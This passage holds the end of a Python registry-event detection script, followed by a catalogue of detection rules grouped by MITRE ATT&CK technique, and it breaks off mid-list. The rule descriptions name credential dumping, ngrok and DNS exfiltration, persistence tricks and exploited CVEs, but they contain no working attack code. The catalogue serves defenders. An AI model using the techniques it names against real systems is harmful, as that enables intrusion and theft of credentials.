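            return technique, level
    return None


def alerts(events: List[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """(TargetObject, technique, level) for every event that hits the watchlist."""
    return [(e["TargetObject"], *c) for e in events if (c := classify(e))]


if __name__ == "__main__":
    for target, technique, level in alerts(EVENTS):
        print(f"[{level:>6}] {technique}  {target}")
```

The first event is deliberately flagged at medium: the rules above treat any new Netsh helper as worth a look, and the baseline of legitimate System32 helpers is what an analyst tunes out locally, not something the detection should silently drop.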
attack.t1546.004 2
Show Rules (2)
  • Edit of .bash_profile and .bashrc - Level: medium
    Description: Detects change of user environment. Adversaries can insert code into these files to gain persistence each time a user logs in or opens a new shell.
  • Unix Shell Configuration Modification - Level: medium
    Description: Detect unix shell configuration modification. Adversaries may establish persistence through executing malicious commands triggered when a new shell is opened.
attack.t1127.001 2
Show Rules (2)
  • Possible Applocker Bypass - Level: low
    Description: Detects execution of executables that can be used to bypass Applocker whitelisting
  • Silenttrinity Stager Msbuild Activity - Level: high
    Description: Detects a possible remote connections to Silenttrinity c2
attack.t1087.004 2
Show Rules (2)
  • RBAC Permission Enumeration Attempt - Level: low
    Description: Detects identities attempting to enumerate their Kubernetes RBAC permissions. In the early stages of a breach, attackers will aim to list the permissions they have within the compromised environment. In a Kubernetes cluster, this can be achieved by interacting with the API server, and querying the SelfSubjectAccessReview API via e.g. a "kubectl auth can-i --list" command. This will enumerate the Role-Based Access Controls (RBAC) rules defining the compromised user's authorization.
  • Discovery Using AzureHound - Level: high
    Description: Detects AzureHound (A BloodHound data collector for Microsoft Azure) activity via the default User-Agent that is used during its operation after successful authentication.
attack.t1505.001 2
Show Rules (2)
  • Suspicious SQL Query - Level: medium
    Description: Detects suspicious SQL query keywords that are often used during recon, exfiltration or destructive activities, such as dropping tables and selecting wildcard fields
  • Potential CVE-2023-27363 Exploitation - HTA File Creation By FoxitPDFReader - Level: high
    Description: Detects suspicious ".hta" file creation in the startup folder by Foxit Reader. This can be an indication of CVE-2023-27363 exploitation.
attack.t1078.002 2
Show Rules (2)
  • Malicious Usage Of IMDS Credentials Outside Of AWS Infrastructure - Level: high
    Description: Detects when an instance identity has taken an action that isn't inside SSM. This can indicate that a compromised EC2 instance is being used as a pivot point.
  • Admin User Remote Logon - Level: low
    Description: Detects remote login by the Administrator user (depending on internal naming pattern).
attack.t1566.002 2
Show Rules (2)
  • Potential Malicious Usage of CloudTrail System Manager - Level: high
    Description: Detect when System Manager successfully executes commands against an instance.
  • Suspicious Execution via macOS Script Editor - Level: medium
    Description: Detects when the macOS Script Editor utility spawns an unusual child process.
attack.t1556.006 2
Show Rules (2)
  • Azure AD Only Single Factor Authentication Required - Level: low
    Description: Detect when users are authenticating without MFA being required.
  • Okta MFA Reset or Deactivated - Level: medium
    Description: Detects when an attempt at deactivating or resetting MFA.
attack.t1591.004 2
Show Rules (2)
  • Bitbucket User Details Export Attempt Detected - Level: medium
    Description: Detects user data export activity.
  • Bitbucket User Permissions Export Attempt - Level: medium
    Description: Detects user permission data export attempt.
attack.t1195.001 2
Show Rules (2)
  • Outdated Dependency Or Vulnerability Alert Disabled - Level: high
    Description: Dependabot performs a scan to detect insecure dependencies, and sends Dependabot alerts. This rule detects when an organization owner disables Dependabot alerts for private repositories or Dependabot security updates for all repositories.
  • Octopus Scanner Malware - Level: high
    Description: Detects Octopus Scanner Malware.
attack.t1574.006 2
Show Rules (2)
  • Modification of ld.so.preload - Level: high
    Description: Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes.
  • Code Injection by ld.so Preload - Level: high
    Description: Detects the ld.so preload persistence file. See `man ld.so` for more information.
attack.t1543.002 2
Show Rules (2)
  • Systemd Service Reload or Start - Level: low
    Description: Detects a reload or a start of a service.
  • Systemd Service Creation - Level: medium
    Description: Detects a creation of systemd services which could be used by adversaries to execute malicious code.
attack.t1204.001 2
Show Rules (2)
  • Symlink Etc Passwd - Level: high
    Description: Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd
  • Suspicious Execution via macOS Script Editor - Level: medium
    Description: Detects when the macOS Script Editor utility spawns an unusual child process.
attack.t1548.001 2
Show Rules (2)
  • PwnKit Local Privilege Escalation - Level: high
    Description: Detects potential PwnKit exploitation CVE-2021-4034 in auth logs
  • Setuid and Setgid - Level: low
    Description: Detects suspicious change of file privileges with chown and chmod commands
attack.t1548.003 2
Show Rules (2)
  • Sudo Privilege Escalation CVE-2019-14287 - Builtin - Level: critical
    Description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287
  • Sudo Privilege Escalation CVE-2019-14287 - Level: high
    Description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287
attack.t1568.002 2
Show Rules (2)
  • Communication To Ngrok Tunneling Service - Linux - Level: high
    Description: Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of data exfiltration by malicious actors
  • Communication To Ngrok Tunneling Service Initiated - Level: high
    Description: Detects an executable initiating a network connection to "ngrok" tunneling domains. Attackers have been seen using ngrok to host their second-stage payloads and malware. While communication with such domains can be legitimate, it is often a sign of either data exfiltration by malicious actors or an additional download.
attack.t1593.003 2
Show Rules (2)
  • Suspicious Git Clone - Linux - Level: medium
    Description: Detects execution of "git" to clone a remote repository whose URL contains suspicious keywords (e.g. names of offensive tooling)
  • Suspicious Git Clone - Level: medium
    Description: Detects execution of "git" to clone a remote repository whose URL contains suspicious keywords (e.g. names of offensive tooling)
attack.t1543.001 2
Show Rules (2)
  • Launch Agent/Daemon Execution Via Launchctl - Level: medium
    Description: Detects the execution of programs as Launch Agents or Launch Daemons using launchctl on macOS.
  • Potential Persistence Via PlistBuddy - Level: high
    Description: Detects potential persistence activity using LaunchAgents or LaunchDaemons via the PlistBuddy utility
attack.t1543.004 2
Show Rules (2)
  • Launch Agent/Daemon Execution Via Launchctl - Level: medium
    Description: Detects the execution of programs as Launch Agents or Launch Daemons using launchctl on macOS.
  • Potential Persistence Via PlistBuddy - Level: high
    Description: Detects potential persistence activity using LaunchAgents or LaunchDaemons via the PlistBuddy utility
attack.t1137.002 2
Show Rules (2)
  • Suspicious Microsoft Office Child Process - MacOS - Level: high
    Description: Detects suspicious child processes spawning from Microsoft Office suite applications such as Word or Excel. This could indicate malicious macro execution
  • Office Application Startup - Office Test - Level: medium
    Description: Detects the addition of the Office Test registry key, which allows a user to specify an arbitrary DLL that will be executed every time an Office application is started
attack.t1102.003 2
Show Rules (2)
  • PwnDrp Access - Level: critical
    Description: Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity
  • Raw Paste Service Access - Level: high
    Description: Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form
attack.t1090.002 2
Show Rules (2)
  • RDP over Reverse SSH Tunnel WFP - Level: high
    Description: Detects svchost hosting RDP termsvcs communicating with the loopback address
  • Network Communication Initiated To Portmap.IO Domain - Level: medium
    Description: Detects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors
attack.t1055.003 2
Show Rules (2)
  • Remote Thread Creation In Uncommon Target Image - Level: medium
    Description: Detects uncommon target processes for remote thread creation
  • HackTool - LittleCorporal Generated Maldoc Injection - Level: high
    Description: Detects the process injection of a LittleCorporal generated Maldoc.
attack.t1036.002 2
Show Rules (2)
  • Potential File Extension Spoofing Using Right-to-Left Override - Level: high
    Description: Detects suspicious filenames that contain a right-to-left override character and a potentially spoofed file extension.
  • Potential Defense Evasion Via Right-to-Left Override - Level: high
    Description: Detects the presence of the "U+202E" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence. This is used as an obfuscation and masquerading technique.
attack.t1542.001 2
Show Rules (2)
  • UEFI Persistence Via Wpbbin - FileCreation - Level: high
    Description: Detects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory, which could be indicative of a UEFI-based persistence method
  • UEFI Persistence Via Wpbbin - ProcessCreation - Level: high
    Description: Detects execution of the binary "wpbbin", which is used as part of the UEFI-based persistence method described in the reference section
attack.t1574.012 2
Show Rules (2)
  • Registry-Free Process Scope COR_PROFILER - Level: medium
    Description: Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (external to .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR. (Citation: Microsoft Profiling Mar 2017) (Citation: Microsoft COR_PROFILER Feb 2013)
  • Enabling COR Profiler Environment Variables - Level: medium
    Description: Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured.
attack.t1564.006 2
Show Rules (2)
  • Suspicious Hyper-V Cmdlets - Level: medium
    Description: Adversaries may carry out malicious operations using a virtual instance to avoid detection
  • Detect Virtualbox Driver Installation OR Starting Of VMs - Level: low
    Description: Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.
attack.t1027.009 2
Show Rules (2)
  • Powershell Token Obfuscation - Powershell - Level: high
    Description: Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation
  • Powershell Token Obfuscation - Process Creation - Level: high
    Description: Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation
attack.t1574.005 2
Show Rules (2)
  • HackTool - SharpUp PrivEsc Tool Execution - Level: critical
    Description: Detects the use of SharpUp, a tool for local privilege escalation
  • Setup16.EXE Execution With Custom .Lst File - Level: medium
    Description: Detects the execution of "Setup16.EXE", an old installation utility, with a custom ".lst" file. These ".lst" files can contain references to external programs that "Setup16.EXE" will execute. Attackers and adversaries might leverage this as a living-off-the-land utility.
attack.t1216.001 2
Show Rules (2)
  • Launch-VsDevShell.PS1 Proxy Execution - Level: medium
    Description: Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.
  • Pubprn.vbs Proxy Execution - Level: medium
    Description: Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.
attack.t1218.013 2
Show Rules (2)
  • Mavinject Inject DLL Into Running Process - Level: high
    Description: Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag
  • Renamed Mavinject.EXE Execution - Level: high
    Description: Detects the execution of a renamed version of the "Mavinject" process, which can be abused to perform process injection using the "/INJECTRUNNING" flag
attack.t1563.002 2
Show Rules (2)
  • Potential MSTSC Shadowing Activity - Level: high
    Description: Detects RDP session hijacking by using MSTSC shadowing
  • Suspicious RDP Redirect Using TSCON - Level: high
    Description: Detects a suspicious RDP session redirect using tscon.exe
attack.t1546.009 2
Show Rules (2)
  • New DLL Added to AppCertDlls Registry Key - Level: medium
    Description: Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.
  • Session Manager Autorun Keys Modification - Level: medium
    Description: Detects modification of autostart extensibility point (ASEP) in registry.
attack.t1553.003 2
Show Rules (2)
  • Persistence Via New SIP Provider - Level: medium
    Description: Detects when an attacker registers a new SIP provider for persistence and defense evasion
  • Kapeka Backdoor Configuration Persistence - Level: medium
    Description: Detects registry set activity of a value called "Seed" stored in the "\Cryptography\Providers\" registry key. The Kapeka backdoor leverages this location to register a new SIP provider for backdoor configuration persistence.
attack.t1036.004 2
Show Rules (2)
  • Operation Wocao Activity - Level: high
    Description: Detects activity mentioned in Operation Wocao report
  • Operation Wocao Activity - Security - Level: high
    Description: Detects activity mentioned in Operation Wocao report
attack.t1070.008 2
Show Rules (2)
  • Access To Windows Outlook Mail Files By Uncommon Applications - Level: low
    Description: Detects file access requests to Windows Outlook Mail by uncommon processes. Could indicate a potential credential-stealing attempt. Requires heavy baselining before usage
  • Windows Mail App Mailbox Access Via PowerShell Script - Level: medium
    Description: Detects PowerShell scripts that try to access the default Windows MailApp MailBox. This indicates manipulation of or access to the stored emails of a user. E.g. this could be used by an attacker to exfiltrate or delete the content of the emails.
attack.t1027.010 2
Show Rules (2)
  • Invocation Of Crypto-Classes From The "Cryptography" PowerShell Namespace - Level: medium
    Description: Detects the invocation of PowerShell commands with references to classes from the "System.Security.Cryptography" namespace. The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. These can be used, for example, to decrypt a malicious payload for defense evasion.
  • Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace - Level: medium
    Description: Detects the setting of a registry value inside "\Shell\Open\Command" that references PowerShell classes from the "System.Security.Cryptography" namespace. The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. These can be used, for example, to decrypt a malicious payload for defense evasion.
attack.t1055.002 1
Show Rules (1)
  • Suspicious In-Memory Module Execution - Level: low
    Description: Detects the access to processes by other suspicious processes which have reflectively loaded libraries in their memory space. An example is SilentTrinity C2 behaviour. Generally speaking, when Sysmon EventID 10 cannot reference a stack call to a dll loaded from disk (the standard way), it will display "UNKNOWN" as the module name. Usually this means the stack call points to a module that was reflectively loaded in memory. Adding to this, it is not common to see such few calls in the stack (ntdll.dll --> kernelbase.dll --> unknown) which essentially means that most of the functions required by the process to execute certain routines are already present in memory, not requiring any calls to external libraries. The latter should also be considered suspicious.
attack.t1218.004 1
Show Rules (1)
  • Possible Applocker Bypass - Level: low
    Description: Detects execution of executables that can be used to bypass Applocker whitelisting
attack.t1069.003 1
Show Rules (1)
  • RBAC Permission Enumeration Attempt - Level: low
    Description: Detects identities attempting to enumerate their Kubernetes RBAC permissions. In the early stages of a breach, attackers will aim to list the permissions they have within the compromised environment. In a Kubernetes cluster, this can be achieved by interacting with the API server, and querying the SelfSubjectAccessReview API via e.g. a "kubectl auth can-i --list" command. This will enumerate the Role-Based Access Controls (RBAC) rules defining the compromised user's authorization.
attack.t1021.007 1
Show Rules (1)
  • AWS Console GetSigninToken Potential Abuse - Level: medium
    Description: Detects potentially suspicious events involving "GetSigninToken". An adversary using the "aws_consoler" tool can leverage this console API to create temporary federated credentials that help obfuscate which AWS credential is compromised (the original access key) and enable the adversary to pivot from the AWS CLI to console sessions without the need for MFA, using the new access key issued in this request.
attack.t1578.003 1
Show Rules (1)
  • Azure Active Directory Hybrid Health AD FS Service Delete - Level: medium
    Description: This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid Health AD FS service instance in a tenant. A threat actor can create a new AD Health AD FS service and create a fake server to spoof AD FS sign-in logs. The Health AD FS service can then be deleted, once it is no longer needed, via HTTP requests to Azure.
attack.t1562.007 1
Show Rules (1)
  • Azure Network Firewall Policy Modified or Deleted - Level: medium
    Description: Identifies when a Firewall Policy is Modified or Deleted.
attack.t1098.005 1
Show Rules (1)
  • Windows LAPS Credential Dump From Entra ID - Level: high
    Description: Detects when an account dumps the LAPS password from Entra ID.
attack.t1586.003 1
Show Rules (1)
  • Okta Suspicious Activity Reported by End-user - Level: high
    Description: Detects when an Okta end-user reports activity by their account as being potentially suspicious.
attack.t1547.006 1
Show Rules (1)
  • Loading of Kernel Module via Insmod - Level: high
    Description: Detects loading of kernel modules with the insmod command. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded into and unloaded from the kernel on demand. Adversaries may use LKMs to obtain persistence within the system or to elevate privileges.
attack.t1588.001 1
Show Rules (1)
  • Relevant ClamAV Message - Level: high
    Description: Detects relevant ClamAV messages
attack.t1055.009 1
Show Rules (1)
  • Potential Linux Process Code Injection Via DD Utility - Level: medium
    Description: Detects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command.
attack.t1562.003 1
Show Rules (1)
  • ESXi Syslog Configuration Change Via ESXCLI - Level: medium
    Description: Detects changes to the ESXi syslog configuration via "esxcli"
attack.t1546.014 1
Show Rules (1)
  • MacOS Emond Launch Daemon - Level: medium
    Description: Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges.
attack.t1037.005 1
Show Rules (1)
  • Startup Item File Created - MacOS - Level: low
    Description: Detects the creation of a startup item plist file that automatically gets executed at boot initialization to establish persistence. Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
attack.t1555.001 1
Show Rules (1)
  • Credentials from Password Stores - Keychain - Level: medium
    Description: Detects password dumps from Keychain
attack.t1569.001 1
Show Rules (1)
  • Launch Agent/Daemon Execution Via Launchctl - Level: medium
    Description: Detects the execution of programs as Launch Agents or Launch Daemons using launchctl on macOS.
attack.t1036.006 1
Show Rules (1)
  • Space After Filename - macOS - Level: low
    Description: Detects attempts to masquerade as legitimate files by adding a space to the end of the filename.
attack.t1553.001 1
Show Rules (1)
  • Gatekeeper Bypass via Xattr - Level: low
    Description: Detects macOS Gatekeeper bypass via xattr utility
attack.t1561.001 1
Show Rules (1)
  • Cisco File Deletion - Level: medium
    Description: See what files are being deleted from flash file systems
attack.t1561.002 1
Show Rules (1)
  • Cisco File Deletion - Level: medium
    Description: See what files are being deleted from flash file systems
attack.t1565.002 1
Show Rules (1)
  • Cisco Modify Configuration - Level: medium
    Description: Modifications to a config that will serve an adversary's impacts or persistence
attack.t1595.002 1
Show Rules (1)
  • DNS Query to External Service Interaction Domains - Level: high
    Description: Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE
attack.t1590.002 1
Show Rules (1)
  • Failed DNS Zone Transfer - Level: medium
    Description: Detects when a DNS zone transfer failed.
attack.t1553.002 1
Show Rules (1)
  • Potential Secure Deletion with SDelete - Level: medium
    Description: Detects files that have extensions commonly seen while SDelete is used to wipe files.
attack.t1134.005 1
Show Rules (1)
  • Addition of SID History to Active Directory Object - Level: medium
    Description: An attacker can use the SID history attribute to gain additional privileges.
attack.t1499.001 1
Show Rules (1)
  • NTFS Vulnerability Exploitation - Level: high
    Description: Detects the exploitation of an NTFS vulnerability, reported without many details via Twitter
attack.t1555.005 1
Show Rules (1)
  • Remote Thread Created In KeePass.EXE - Level: high
    Description: Detects remote thread creation in "KeePass.exe", which could indicate potential password dumping activity
attack.t1599.001 1
Show Rules (1)
  • WinDivert Driver Load - Level: high
    Description: Detects the load of the WinDivert driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows
attack.t1137.003 1
Show Rules (1)
  • Potential Persistence Via Outlook Form - Level: high
    Description: Detects the creation of a new Outlook form which can contain malicious code
attack.t1547.015 1
Show Rules (1)
  • Windows Terminal Profile Settings Modification By Uncommon Process - Level: medium
    Description: Detects the creation or modification of the Windows Terminal Profile settings file "settings.json" by an uncommon process.
attack.t1027.002 1
Show Rules (1)
  • Python Image Load By Non-Python Process - Level: medium
    Description: Detects the image load of "Python Core" by a non-Python process. This might be indicative of a Python script bundled with Py2Exe.
attack.t1114.001 1
Show Rules (1)
  • Powershell Local Email Collection - Level: medium
    Description: Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user's local system, such as Outlook storage or cache files.
attack.t1055.011 1
Show Rules (1)
  • Uncommon Process Access Rights For Target Image - Level: low
    Description: Detects process access request to uncommon target images with a "PROCESS_ALL_ACCESS" access mask.
attack.t1542.003 1
Show Rules (1)
  • Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE - Level: medium
    Description: Detects potential malicious and unauthorized usage of bcdedit.exe
attack.t1614.001 1
Show Rules (1)
  • Console CodePage Lookup Via CHCP - Level: medium
    Description: Detects use of chcp to look up the system locale value as part of host discovery
attack.t1218.002 1
Show Rules (1)
  • Control Panel Items - Level: high
    Description: Detects the malicious use of a control panel item
attack.t1048.001 1
Show Rules (1)
  • DNS Exfiltration and Tunneling Tools Execution - Level: high
    Description: Well-known DNS Exfiltration tools execution
attack.t1110.002 1
Show Rules (1)
  • HackTool - Hashcat Password Cracker Execution - Level: high
    Description: Detects Hashcat.exe executed with a SAM file obtained from the Windows registry and a password list to crack against
attack.t1134.004 1
Show Rules (1)
  • HackTool - PPID Spoofing SelectMyParent Tool Execution - Level: high
    Description: Detects the use of parent process ID spoofing tools such as Didier Stevens' tool SelectMyParent
attack.t1574.008 1
Show Rules (1)
  • Using SettingSyncHost.exe as LOLBin - Level: high
    Description: Detects using SettingSyncHost.exe to run hijacked binary
attack.t1590.001 1
Show Rules (1)
  • PUA - Crassus Execution - Level: high
    Description: Detects Crassus, a Windows privilege escalation discovery tool, based on PE metadata characteristics.
attack.t1562.010 1
Show Rules (1)
  • LSA PPL Protection Disabled Via Reg.EXE - Level: high
    Description: Detects the usage of the "reg.exe" utility to disable PPL protection on the LSA process
attack.t1505.005 1
Show Rules (1)
  • Potential Suspicious Activity Using SeCEdit - Level: medium
    Description: Detects potentially suspicious behaviour using secedit.exe, such as exporting or modifying the security policy
attack.t1574.007 1
Show Rules (1)
  • Potential Suspicious Activity Using SeCEdit - Level: medium
    Description: Detects potentially suspicious behaviour using secedit.exe, such as exporting or modifying the security policy
attack.t1547.014 1
Show Rules (1)
  • Potential Suspicious Activity Using SeCEdit - Level: medium
    Description: Detects potentially suspicious behaviour using secedit.exe, such as exporting or modifying the security policy
attack.t1547.002 1
Show Rules (1)
  • Potential Suspicious Activity Using SeCEdit - Level: medium
    Description: Detects potentially suspicious behaviour using secedit.exe, such as exporting or modifying the security policy
attack.t1021.005 1
Show Rules (1)
  • Suspicious UltraVNC Execution - Level: high
    Description: Detects a suspicious UltraVNC command line flag combination that indicates an auto-reconnect upon execution, e.g. at startup (as seen being used by the Gamaredon threat group)
attack.t1546.010 1
Show Rules (1)
  • New DLL Added to AppInit_DLLs Registry Key - Level: medium
    Description: DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll
attack.t1547.005 1
Show Rules (1)
  • Security Support Provider (SSP) Added to LSA Configuration - Level: high
    Description: Detects the addition of an SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.
attack.t1547.008 1
Show Rules (1)
  • DLL Load via LSASS - Level: high
    Description: Detects a method to load a DLL via the LSASS process using an undocumented registry key
attack.t1559.002 1
Show Rules (1)
  • Enable Microsoft Dynamic Data Exchange - Level: medium
    Description: Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.
attack.t1547.003 1
Show Rules (1)
  • New TimeProviders Registered With Uncommon DLL Name - Level: high
    Description: Detects processes setting a new DLL in the DllName value under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.
attack.t1036.008 1
Show Rules (1)
  • Non-DLL Extension File Renamed With DLL Extension - Level: medium
    Description: Detects rename operations of files with non-DLL extensions to files with a DLL extension. This is often performed by malware in order to avoid initial detections based on extensions.
attack.t1090.004 1
Show Rules (1)
  • Potentially Suspicious Azure Front Door Connection - Level: medium
    Description: Detects connections with Azure Front Door (known legitimate service that can be leveraged for C2) that fall outside of known benign behavioral baseline (not using common apps or common azurefd.net endpoints)
attack.t1583.006 1
Show Rules (1)
  • Potential AWS Cloud Email Service Abuse - Level: medium
    Description: Detects when the email sending feature is enabled for an AWS account and the email address verification request is dispatched in quick succession
attack.t1574.010 1
Show Rules (1)
  • Files Dropped to Program Files by Non-Privileged Process - Level: medium
    Description: Detects the dropping of files into the Windows or Program Files folders by non-privileged processes

Top MITRE Other Techniques

Other Technique | Count | Rule Title | Count Bar
detection.emerging_threats 333
Show Rules (333)
  • Rejetto HTTP File Server RCE - Level: high
    Description: Detects attempts to exploit a Rejetto HTTP File Server (HFS) via CVE-2014-6287
  • CVE-2010-5278 Exploitation Attempt - Level: critical
    Description: MODx manager - Local File Inclusion: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter.
  • ZxShell Malware - Level: critical
    Description: Detects a ZxShell start by its called and well-known function name
  • Turla Group Lateral Movement - Level: critical
    Description: Detects automated lateral movement by Turla group
  • Turla Group Commands May 2020 - Level: critical
    Description: Detects commands used by Turla group as reported by ESET in May 2020
  • Exploit for CVE-2015-1641 - Level: critical
    Description: Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641
  • Exploit for CVE-2017-0261 - Level: medium
    Description: Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262
  • Droppers Exploiting CVE-2017-11882 - Level: critical
    Description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe
  • Exploit for CVE-2017-8759 - Level: critical
    Description: Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759
  • Adwind RAT / JRAT - Level: high
    Description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
  • CosmicDuke Service Installation - Level: critical
    Description: Detects the installation of a service named "javamtsup" on the system. The CosmicDuke info stealer uses Windows services typically named "javamtsup" for persistence.
  • Fireball Archer Install - Level: high
    Description: Detects Archer malware invocation via rundll32
  • Malware Shellcode in Verclsid Target Process - Level: high
    Description: Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro
  • NotPetya Ransomware Activity - Level: critical
    Description: Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil
  • Potential PlugX Activity - Level: high
    Description: Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location
  • StoneDrill Service Install - Level: high
    Description: This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky
  • WannaCry Ransomware Activity - Level: critical
    Description: Detects WannaCry ransomware activity
  • Potential APT10 Cloud Hopper Activity - Level: high
    Description: Detects potential process and execution activity related to APT10 Cloud Hopper operation
  • Ps.exe Renamed SysInternals Tool - Level: high
    Description: Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report
  • Equation Group C2 Communication - Level: high
    Description: Detects communication to C2 servers mentioned in the operational notes of the ShadowBroker leak of EquationGroup C2 tools
  • Lazarus System Binary Masquerading - Level: high
    Description: Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location
  • Turla Group Named Pipes - Level: critical
    Description: Detects a named pipe used by Turla group samples
  • Turla Service Install - Level: high
    Description: This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET
  • Turla PNG Dropper Service - Level: critical
    Description: This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018
  • Fortinet CVE-2018-13379 Exploitation - Level: critical
    Description: Detects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs
  • Oracle WebLogic Exploit - Level: critical
    Description: Detects access to a webshell dropped into a keystore folder on the WebLogic server
  • Elise Backdoor Activity - Level: critical
    Description: Detects Elise backdoor activity used by APT32
  • APT27 - Emissary Panda Activity - Level: critical
    Description: Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27
  • Sofacy Trojan Loader Activity - Level: high
    Description: Detects Trojan loader activity as used by APT28
  • APT29 2018 Phishing Campaign File Indicators - Level: critical
    Description: Detects indicators of the APT 29 (Cozy Bear) phishing campaign as reported by Mandiant
  • APT29 2018 Phishing Campaign CommandLine Indicators - Level: critical
    Description: Detects indicators of the APT 29 (Cozy Bear) phishing campaign as reported by Mandiant
  • OceanLotus Registry Activity - Level: critical
    Description: Detects registry keys created in OceanLotus (also known as APT32) attacks
  • Potential MuddyWater APT Activity - Level: high
    Description: Detects potential Muddywater APT activity
  • OilRig APT Activity - Level: critical
    Description: Detects OilRig activity as reported by Nyotron in their March 2018 report
  • OilRig APT Registry Persistence - Level: critical
    Description: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report
  • OilRig APT Schedule Task Persistence - Security - Level: critical
    Description: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
  • OilRig APT Schedule Task Persistence - System - Level: critical
    Description: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
  • Defrag Deactivation - Level: medium
    Description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group
  • Defrag Deactivation - Security - Level: medium
    Description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group
  • TropicTrooper Campaign November 2018 - Level: high
    Description: Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia
  • Potential BearLPE Exploitation - Level: high
    Description: Detects potential exploitation of the BearLPE exploit using the Task Scheduler ".job" import arbitrary DACL write
  • Pulse Secure Attack CVE-2019-11510 - Level: critical
    Description: Detects CVE-2019-11510 exploitation attempt - URI contains Guacamole
  • Exploiting SetupComplete.cmd CVE-2019-1378 - Level: high
    Description: Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378
  • Citrix Netscaler Attack CVE-2019-19781 - Level: critical
    Description: Detects CVE-2019-19781 exploitation attempt against Citrix Netscaler, Application Delivery Controller and Citrix Gateway Attack
  • Exploiting CVE-2019-1388 - Level: critical
    Description: Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM
  • Potential Baby Shark Malware Activity - Level: high
    Description: Detects activity that could be related to Baby Shark malware
  • Confluence Exploitation CVE-2019-3398 - Level: critical
    Description: Detects the exploitation of the Confluence vulnerability described in CVE-2019-3398
  • Potential Dridex Activity - Level: critical
    Description: Detects potential Dridex activity via specific process patterns
  • Potential Dtrack RAT Activity - Level: critical
    Description: Detects potential Dtrack RAT activity via specific process patterns
  • Potential Emotet Activity - Level: high
    Description: Detects all Emotet like process executions that are not covered by the more generic rules
  • Formbook Process Creation - Level: high
